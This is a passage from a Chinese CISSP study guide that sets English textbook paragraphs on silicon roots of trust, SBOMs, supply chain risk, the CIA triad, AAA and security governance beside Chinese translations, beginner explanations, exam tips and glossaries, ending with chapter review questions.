常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
供应链风险管理 SCRM 管理供应商、硬件、软件、服务和交付链条的风险。
硅信任根 硅信任根把硬件级可信能力放进芯片,用于启动、认证、密钥等。
学习单元 49 / PDF P126

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

securing data, establishing secure communications, and authenticating the system. Remote attestation: Many silicon RoTs support remote attestation, which enables a remote entity to verify the trustworthiness of a system. This is crucial for cloud computing and IoT devices. Silicon roots of trust are fundamental in building secure systems, particularly in environments where the integrity of the hardware and software is critical, such as data centers, cloud computing, and Internet of Things (IoT) devices. They provide a solid foundation for security by ensuring that the system starts in a known, trusted state and can maintain that trust throughout its operation.

A physically unclonable function (PUF) is a specialized physical electronic component or function that generates a unique, unpredictable digital identifier based on the inherent physical properties of the component. PUFs are used to provide a hardware-based security feature by creating a unique fingerprint for electronic devices or integrated circuits. This fingerprint can be used for device authentication, encryption keys, or other security-related purposes. PUFs have gained prominence in the field of hardware security and have applications in various domains, including IoT devices, hardware-based cryptography, secure boot processes, and authentication of integrated circuits.

PUF components prevent counterfeits or implants along a supply chain, therefore establishing a more secure SCRM. A software bill of materials (SBOM) is a structured and comprehensive inventory or list of all the software components and dependencies that make up a software application or system. An SBOM provides detailed information about the various software components used in a system, including their versions, sources, and relationships. The primary purpose of an SBOM is to enhance software transparency, security, compliance, and management.

SBOMs play a vital role in software security, particularly in identifying and addressing vulnerabilities and risks associated with the software components. Security teams can use SBOMs to track and address known vulnerabilities and apply patches or updates as needed. In the context of software supply chain management, SBOMs help organizations track the origins and sources of software components, ensuring that they come from trusted and secure sources.

中文直译 / 整理

保护数据、建立安全通信以及对系统进行身份验证。 远程认证:许多硅基RoT支持远程认证,使远程实体能够验证系统的可信 性。 这对于云计算和物联网设备至关重要。 硅基可信根在构建安全系统中至关重要,特别是在硬件和软件完整性至关重要 的环境中,例如数据中心、云计算和物联网(IoT)设备。 它们通过确保系统 从已知且可信的状态启动,并在整个运行过程中维持这种信任,为安全提供了 坚实的基础。 物理不可克隆函数(PUF)是一种特殊的物理电子组件或功能,它基于组件的 固有物理特性生成唯一且不可预测的数字标识符。 PUF通过为电子设备或集成 电路创建唯一的指纹来提供基于硬件的安全功能。 此指纹可用于设备身份验证、 加密密钥或其他安全相关用途。 PUF在硬件安全领域已获得广泛关注,并应用 于物联网设备、基于硬件的密码学、安全启动过程和集成电路身份验证等各种 领域。 PUF组件可防止供应链中的仿冒或植入,从而建立更安全的SCRM。 软件物料清单 SBOM(SBOM)是构成软件应用程序或系统的所有软件组件和依赖项 的结构化且全面的清单或列表。 SBOM提供有关系统中使用的各种软件组件的 详细信息,包括其版本、来源和关系。

SBOM的主要目的是增强软件的透明度、 安全性、合规性和管理。 SBOM 在软件安全中发挥着至关重要的作用,特别是在识别和解决与软件组件 相关的漏洞和风险方面。 安全团队可以使用 SBOM 跟踪并处理已知漏洞,并根 据需要应用补丁或更新。 在软件供应链管理的背景下,SBOM 帮助组织跟踪软 件组件的来源和出处,确保其来自可信且安全的渠道。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

外包、供应商、硬件篡改、假冒、植入、SBOM 都是 SCRM 场景。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
供应链风险管理 SCRM 管理供应商、硬件、软件、服务和交付链条的风险。
软件物料清单 SBOM 列出软件使用了哪些组件和依赖,便于追踪漏洞和供应链风险。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 50 / PDF P127

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

SBOMs are becoming increasingly important as software ecosystems grow in complexity, and organizations rely on a multitude of software components from various sources. They aid in managing software supply chains, improving security, and ensuring compliance with legal and regulatory requirements. In some cases, SBOMs may also be used to provide information to users, customers, and stakeholders about the software components used in a particular product or system. Numerous security elements can be incorporated into an SCRM plan. Not all of these may be relevant to every organization.

However, most organizations would benefit from integrating some or all of these security features into their existing supply chain management processes. Summary Security governance, management concepts, and principles are inherent elements in a security policy and in solution deployment. They define the basic parameters needed for a secure environment. They also define the goals and objectives that both policy designers and system implementers must achieve in order to create a secure solution. The primary goals and objectives of security are contained within the CIA Triad: confidentiality, integrity, and availability.

Confidentiality is the principle that objects are not disclosed to unauthorized subjects. Integrity is the principle that objects retain their veracity and are intentionally modified only by authorized subjects. Availability is the principle that authorized subjects are granted timely and uninterrupted access to objects. Other security-related concepts and principles that should be considered and addressed when designing a security policy and deploying a security solution are identification, authentication, authorization, accounting, auditing, nonrepudiation, defense in depth, abstraction, data hiding, and encryption.

Security roles determine who is responsible for the security of an organization's assets. Common roles include senior manager, security professionals, asset owners, custodians, users, and auditors. A formalized security policy structure consists of policies, standards, baselines, guidelines, and procedures. These individual documents are elements essential to the design and implementation of security in any environment. To be effective, the approach to security management must be a top-down approach.

中文直译 / 整理

随着软件生态系统日益复杂,组织依赖来自各种来源的大量软件组件, SBOM 的重要性正日益提升。 它们有助于管理软件供应链、提升安全性,并确 保符合法律和监管要求。 在某些情况下,SBOM 还可用于向用户、客户和利益 相关者提供有关特定产品或系统中所使用软件组件的信息。 可以在SCRM计划中纳入众多安全要素。 并非所有这些要素都适用于每个组织。 然而,大多数组织通过将部分或全部这些安全功能集成到现有的供应链管理流 程中,都将从中受益。 摘要 安全治理、管理概念和原则是安全策略和解决方案部署中的固有要素。 它们定 义了构建安全环境所需的基本参数,同时也明确了策略设计者和系统实施者为 创建安全解决方案必须实现的目标和目的。 安全的主要目标和目的包含在CIA三要素中:机密性、完整性和可用性。 机密 性是指对象不得向未经授权的主体披露; 完整性是指对象保持其真实性,且仅 由授权主体有意修改; 可用性是指授权主体能够及时且不间断地访问对象。 在设计安全策略和部署安全解决方案时,还应考虑和应对其他与安全相关的概 念和原则,包括身份识别、身份验证、授权、记账、审计、不可否认性性、纵深 防御、抽象化、数据隐藏和加密。

安全角色决定了谁负责组织资产的安全。 常见角色包括高级管理人员、 安全专业人员、资产所有者、保管人、用户和审计人员。 正式的安全策略结构包括策略、标准、基线、指南和程序。 这些独立的文档是 任何环境中安全设计与实施的基本要素。 要有效,安全管理的方法必须是自上 而下的方法。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书、签名、强认证常支持真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 51 / PDF P128

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Security control frameworks are structured sets of guidelines, standards, best practices, and controls designed to help organizations effectively manage and enhance their information security and cybersecurity posture. Entities and examples of SCFs include ISO, NIST, COBIT, SABSA, PCI DSS, FedRAMP, and ITIL. Threat modeling is the security process where potential threats are identified, categorized, and analyzed. Threat modeling can be performed as a proactive measure during design and development or as a reactive measure once a product has been deployed.

In either case, the process identifies the potential harm, the probability of occurrence, the priority of concern, and the means to eradicate or reduce the threat. Integrating cybersecurity risk management with supply chain, acquisition strategies, and business practices is a means to ensure a more robust and successful security strategy in organizations of all sizes. When purchases are made without security considerations, the risks inherent in those products remain throughout their deployment life span. Study Essentials Understand the CIA Triad elements of confidentiality, integrity, and availability. Confidentiality is the principle that objects are not disclosed to unauthorized subjects.

Integrity is the principle that objects retain their veracity and are intentionally modified only by authorized subjects. Availability is the principle that authorized subjects are granted timely and uninterrupted access to objects. Know the elements of AAA services. AAA services focus on identification, authentication, authorization, auditing, and accounting. Be able to explain how identification works. Identification is when a subject professes an identity and accounting is initiated. A subject must provide an identity to a system to start the process of authentication, authorization, and accounting. Understand the process of authentication.

Authentication is the process of verifying or testing that a claimed identity is valid. Authentication requires information from the subject that must exactly correspond to the identity indicated.

中文直译 / 整理

安全控制框架是结构化的指南、标准、最佳实践和控制措施集合,旨在帮助组 织有效管理和提升其信息安全和网络安全态势。 安全控制框架的实体和示例包 括 ISO、NIST、COBIT、SABSA、PCI DSS、FedRAMP 和 ITIL。 威胁建模是一种安全流程,用于识别、分类和分析潜在威胁。 威胁建模可以在 设计和开发阶段作为预防性措施执行,也可以在产品部署后作为应对性措施执 行。 无论哪种情况,该流程都会识别潜在危害、发生概率、关注优先级以及消 除或降低威胁的手段。 将网络安全风险管理与供应链、采购策略和业务实践相结合,是确保各类组织 更稳健、更成功安全策略的一种手段。 如果在采购时未考虑安全因素,这些产 品中固有的风险将贯穿其整个部署生命周期。 学习要点 理解CIA三要素:机密性、完整性和可用性。 机密性是指对象不得向未经授权的 主体披露。 完整性是指对象保持其真实性,且仅由授权主体有意修改。 可用性是 指授权主体能够及时且不间断地访问对象。 了解AAA服务的要素。 AAA服务侧重于身份识别、身份验证、授权、审计 和计费。 能够解释身份识别的工作原理。 身份识别是指主体声明其身份并启动计费的过 程。

主体必须向系统提供身份,以开始认证、授权和计费的过程。 理解身份验证的过程。 身份验证是验证或检验所声明的身份是否有效的过程。 身份验证需要主体提供与所声明身份完全一致的信息。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书、签名、强认证常支持真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 52 / PDF P129

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Know how authorization fits into a security plan. Once a subject is authenticated, its access must be authorized. The process of authorization ensures that the requested activity or object access is possible given the rights and privileges assigned to the authenticated identity. Be able to explain the auditing process. Auditing is the programmatic means by which subjects are held accountable for their actions while authenticated on a system through the documentation or recording of subject activities. Understand the importance of accounting. Security can be maintained only if subjects are held accountable for their actions.

Effective accounting relies on the capability to prove a subject's identity and track their activities. Be able to explain the concept of abstraction. Abstraction is used to collect similar elements into groups, classes, or roles that are assigned security controls, restrictions, or permissions as a collective. It adds efficiency to carrying out a security plan. Know about security boundaries. A security boundary is the line of intersection between any two areas, subnets, or environments that have different security requirements or needs. Understand security governance.

Security governance is the collection of practices related to supporting, defining, and directing the security efforts of an organization. Know about third-party governance. Third-party governance is the system of external entity oversight that may be mandated by law, regulation, industry standards, contractual obligation, or licensing requirements. The actual method of governance may vary, but it generally involves an outside investigator or auditor. Understand documentation review. Documentation review is the process of reading the exchanged materials and verifying them against standards and expectations.

In many situations, especially those related to government or military agencies or contractors, failing to provide sufficient documentation to meet requirements of third-party governance can result in a loss of or a voiding of authorization to operate (ATO). Understand the alignment of security function to business strategy, goals, mission, and objectives. Security management planning ensures the proper creation, implementation, and enforcement of a security policy.

中文直译 / 整理

了解授权如何融入安全计划。 一旦主体通过身份验证,其访问权限必须被授权。 授权过程确保在给定已分配给已验证身份的权利和权限的情况下,所请求的活动 或对象访问是可能的。 能够解释审计过程。 审计是通过记录或文档化主体活动,以程序化方式确保主 体在系统上经过身份验证后对其行为负责的手段。 理解会计的重要性。 仅当主体对其行为负责时,安全才能得到维护。 有效的会 计依赖于证明主体身份并跟踪其活动的能力。 能够解释抽象的概念。 抽象用于将相似的元素归类为组、类或角色,并作为整体 分配安全控制、限制或权限。 它提高了实施安全计划的效率。 了解安全边界。 安全边界是任何两个具有不同安全要求或需求的区域、子网 或环境之间的交界线。 理解安全治理。 安全治理是与支持、定义和指导组织安全工作相关的实践集合。 了解第三方治理。 第三方治理是由法律、法规、行业标准、合同义务或许可要 求所规定的外部实体监督体系。 治理的实际方法可能有所不同,但通常涉及外 部调查员或审计员。 理解文档审查。 文档审查是阅读交换的材料并将其与标准和期望进行核对的过 程。

在许多情况下,特别是涉及政府或军方机构或承包商时,未能提供足够的 文档以满足第三方治理的要求,可能导致运营授权(ATO)被取消或失效。 理解安全功能与业务战略、目标、使命和宗旨的对齐。 安全管理规划确保安全政 策的正确创建、实施和执行 安全政策。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

对象、角色、组、接口都可能体现 abstraction。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
第三方治理 外包出去不等于责任也外包出去,组织仍要监督供应商。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
业务战略对齐 安全要支持组织使命和目标,而不是单独追求技术完美。
学习单元 53 / PDF P130

三类安全计划:战略、战术、运营

长期方向、中期落地、短期日常要分清。

教材原文段落

Security management planning aligns the security functions to the strategy, goals, mission, and objectives of the organization. This includes designing and implementing security based on business cases, budget restrictions, or scarcity of resources. Know what a business case is. A business case is usually a documented argument or stated position in order to define a need to make a decision or take some form of action. To make a business case is to demonstrate a business-specific need to alter an existing process or choose an approach to a business task. A business case is often made to justify the start of a new project, especially a project related to security.

Understand security management planning. Security management is based on three types of plans: strategic, tactical, and operational. A strategic plan is a long-term plan that is fairly stable. It defines the organization's goals, mission, and objectives. The tactical plan is a midterm plan developed to provide more details on accomplishing the goals set forth in the strategic plan. Operational plans are short-term and highly detailed plans based on strategic and tactical plans. Know the elements of a formalized security policy structure. To create a comprehensive security plan, you need the following items in place: security policy, standards, baselines, guidelines, and procedures.

Understand key security roles. The primary security roles are senior manager, security professional, asset owner, custodian, user, and auditor. Understand due diligence and due care. Due diligence is establishing a plan, policy, and process to protect the interests of an organization. Due care is practicing the individual activities that maintain the due diligence effort. Due diligence is knowing what should be done and planning for it; due care is doing the right action at the right time. Know the basics of threat modeling. Threat modeling is the security process where potential threats are identified, categorized, and analyzed.

Threat modeling can be performed as a proactive measure during design and development or as a reactive measure once a product has been deployed. Key concepts include assets/attackers/software, STRIDE, PASTA, VAST, diagramming, reduction/decomposing, and DREAD. Understand supply chain risk management (SCRM) concepts. SCRM is a means to ensure that all the vendors or links in the supply chain are reliable, trustworthy, reputable organizations that disclose their practices

中文直译 / 整理

安全管理规划将安全功能与组织的战略、目标、使命和宗旨对齐。 这包括根 据业务案例、预算限制或资源稀缺性来设计和实施安全措施。 了解业务案例的含义。 业务案例通常是经过文档化的论点或明确立场,旨在界定 做出决策或采取某种行动的必要性。 构建业务案例是为了证明存在业务特定的需 求,需要更改现有流程或选择一种业务任务的处理方式。 业务案例常用于证明启 动新项目的合理性,尤其是与安全相关的项目。 理解安全管理规划。 安全管理基于三种类型的计划:战略计划、战术计划和操作 计划。 战略计划是一种长期且相对稳定的计划,它定义了组织的目标、使命和宗 旨。 战术计划是一种中期计划,旨在为实现战略计划中设定的目标提供更详细的 指导。 操作计划是短期且高度详细的计划,基于战略计划和战术计划制定。 了解正式化安全策略结构的要素。 要制定全面的安全计划,您需要具备以下内 容:安全政策、标准、基线、指南和程序。 了解关键的安全角色。 主要的安全角色包括高级经理、安全专业人员、资产所有 者、保管人、用户和审计员。 了解尽职调查和尽责。 尽职调查是制定计划、政策和流程以保护组织利益的过 程。 尽责是实践维持尽职调查工作的各项具体活动。

尽职调查是知晓应做什么并 为之规划; 尽责是在正确的时间采取正确的行动。 了解威胁建模的基础知识。 威胁建模是一种安全过程,用于识别、分类和分析 潜在威胁。 威胁建模可在设计和开发阶段作为预防性措施执行,也可在产品部 署后作为应对性措施执行。 关键概念包括资产/攻击者/软件、STRIDE、 PASTA、VAST、绘图、简化/分解和DREAD。 理解供应链风险管理(SCRM)概念。 SCRM 是一种确保供应链中的所有供 应商或环节均为可靠、可信、有声誉的组织,并公开其实践的方法

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:长期方向、中期落地、短期日常要分清。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

战略计划:战略计划是长期、稳定、方向性的安全计划。

战术计划:战术计划把战略拆成中期可执行方案。

运营计划:运营计划是每天、每周、每月执行的具体活动。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“三类安全计划:战略、战术、运营”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Strategic 长期,Tactical 中期,Operational 短期日常。

战术计划通常支持战略计划落地。

日常操作、流程、任务安排常归 operational。

Due care 偏“做正确的事”。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
战略计划 战略计划是长期、稳定、方向性的安全计划。
战术计划 战术计划把战略拆成中期可执行方案。
运营计划 运营计划是每天、每周、每月执行的具体活动。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
学习单元 54 / PDF P131

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

and security requirements to their business partners. SCRM includes evaluating risks associated with hardware, software, and services; performing third-party assessment and monitoring; establishing minimum security requirements; and enforcing service-level requirements. Written Lab 1. Discuss and describe the CIA Triad. 2. What are the requirements to hold a person accountable for the actions of their user account? 3. Name the six primary security roles as defined by ISC2 for CISSP. 4. What are the four components of a complete organizational security policy and their basic purpose? Review Questions 1.

Confidentiality, integrity, and availability are typically viewed as the primary goals and objectives of a security infrastructure. Which of the following is not considered a violation of confidentiality? A. Stealing passwords using a keystroke logging tool B. Eavesdropping on wireless network communications C. Hardware destruction caused by arson D. Social engineering that tricks a user into providing personal information to a false website 2. Security governance requires a clear understanding of the objectives of the organization as the core concepts of security. Which of the following contains the primary goals and objectives of security? A. A network's border perimeter B.

The CIA Triad C. AAA services D. Ensuring that subject activities are recorded 3. Jamie recently discovered an attack taking place against his organization that prevented employees from accessing critical records. What element

中文直译 / 整理

并向其业务合作伙伴披露安全要求。 SCRM 包括评估与硬件、软件和服务相关 的风险; 进行第三方评估和监控; 建立最低安全要求; 以及执行服务水平要求。 书面实验 1. 讨论并描述CIA三元组。 2. 要对某人用户账户的行为负责,需要满足哪些条件? 3. 根据ISC2为CISSP定义的六个主要安全角色是什么? 4. 一个完整的组织安全策略的四个组成部分及其基本用途是什么? 复习题 1. 机密性、完整性和可用性通常被视为安全基础设施的主要目标和宗旨。 以下哪一项不被视为对机密性的侵犯? A. 使用键盘记录工具窃取密码 B. 窃听无线网络通信 C. 由纵火导致的硬件损坏 D. 社会工程学欺骗用户向虚假网站提供个人信息 2. 安全治理需要清晰理解组织的目标作为安全的核心概念。 以下哪一项包含 了安全的主要目标和宗旨? A. 网络的边界边界 B. CIA 三元组 C. AAA 服务 D. 确保记录主体活动 3. 杰米最近发现了一起针对其组织的攻击,导致员工无法访问关键记录。 什么元 素

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
政策 政策是高层原则,说明必须遵守什么。
供应链风险管理 SCRM 管理供应商、硬件、软件、服务和交付链条的风险。
学习单元 55 / PDF P132

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

